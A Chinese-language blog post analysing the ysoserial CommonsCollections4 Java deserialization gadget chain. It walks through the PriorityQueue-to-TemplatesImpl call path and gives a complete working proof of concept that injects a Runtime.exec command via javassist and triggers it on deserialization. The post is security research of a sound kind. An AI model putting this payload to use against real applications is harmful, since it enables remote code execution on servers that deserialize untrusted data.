Ananaskr's Blog
0%

ysoserial分析之CommonsCollections4

Posted on Edited on In

这篇文章分析的是CommonsCollections4,它与CommonsCollections2一样都是针对commonscollections4.0版本的利用链。它像是CommonsCollections2与CommonsCollections3的结合版。前面使用了2中的Priority类,后面用到了TrAXFilter类。

前面已经分析过:
ysoserial分析之CommonsCollections1
ysoserial分析之CommonsCollections3
ysoserial分析之CommonsCollections2

CommonsCollection4与CommonsCollections2一样,都用到了Priority类中的comparator来触发transform函数。不同的是CommonsCollections2利用的是InvokerTransformer的反射机制来调用到TemplatesImpl对象的newTransformer函数。而4中利用的是在CommonsCollections3中提到过可以利用TrAXFilter类的初始化来加载TemplatesImpl类,从而在该类实例化时执行任意命令。

首先看一下整体的反序列化链。由于不再利用InvoerTransformer类,Priority类的queue成员变量放入的元素就可以随意了。

1
2
3
4
5
6
7
8
PriorityQueue.readObject()
  ->heapify()
	->siftDown()
	  ->siftDownUsingComparator()
		->comparator.compare()
		  ->ChainedTransformer.transform()
			->ConstantTransformer.transform()
			->InstantiateTransformer.transform()

由于整个链在前面分别地分析过,这里就不再分析,直接构造payload。

payload构造

整个payload的构造主要是ChainedTransformer的构造,这部分可以参考CommonsCollections3的构造。其次是Priority对象的构造,将其成员变量comparator赋值为TransformingComparator对象,而TransformingComparator对象实例化时,传入了构造好的chainedTransformer。

完整的demo如下所示

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.*;
import java.util.PriorityQueue;

public class test {
    public static class StubTransletPayload extends AbstractTranslet implements Serializable {
        private static final long serialVersionUID = -5971610431559700674L;

        public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {}

        @Override
        public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException{}
    }

    public static class Foo implements Serializable {

        private static final long serialVersionUID = 8207363842866235160L;
    }

    public static void main(String[] args) throws Exception{

         String command = "/Applications/Calculator.app/Contents/MacOS/Calculator";
         String cmd = "java.lang.Runtime.getRuntime().exec(\"" +
                 command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
                 "\");";

         Object templates = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl").newInstance();

         ClassPool pool = ClassPool.getDefault();
         pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
         pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
         CtClass clazz = pool.get(StubTransletPayload.class.getName());

         clazz.makeClassInitializer().insertAfter(cmd);
         CtClass superC = pool.get(AbstractTranslet.class.getName());
         clazz.setSuperclass(superC);

         byte[] classBytes = clazz.toBytecode();

         Field field = templates.getClass().getDeclaredField("_bytecodes");
         field.setAccessible(true);
         field.set(templates,new byte[][]{classBytes,classFiles.classAsBytes(Foo.class)});

         Field field2 = templates.getClass().getDeclaredField("_name");
         field2.setAccessible(true);
         field2.set(templates,"ananaskr");

         Field field3 = templates.getClass().getDeclaredField("_tfactory");
         field3.setAccessible(true);
         field3.set(templates, TransformerFactoryImpl.class.newInstance());


         Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates})
         };

         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
         TransformingComparator transcomparator = new TransformingComparator(chainedTransformer);
         PriorityQueue priorityQueue = new PriorityQueue(2,transcomparator);
         
         priorityQueue.add(1);
         priorityQueue.add(1);
         
         ByteArrayOutputStream baos = new ByteArrayOutputStream();
         ObjectOutputStream out = new ObjectOutputStream(baos);
         out.writeObject(priorityQueue);
         out.flush();
         out.close();

         byte[] bytes = baos.toByteArray();

         ByteArrayInputStream bais = new ByteArrayInputStream(bytes);
         ObjectInputStream in = new ObjectInputStream(bais);
         in.readObject();
         in.close();

        }
}

运行结果如下: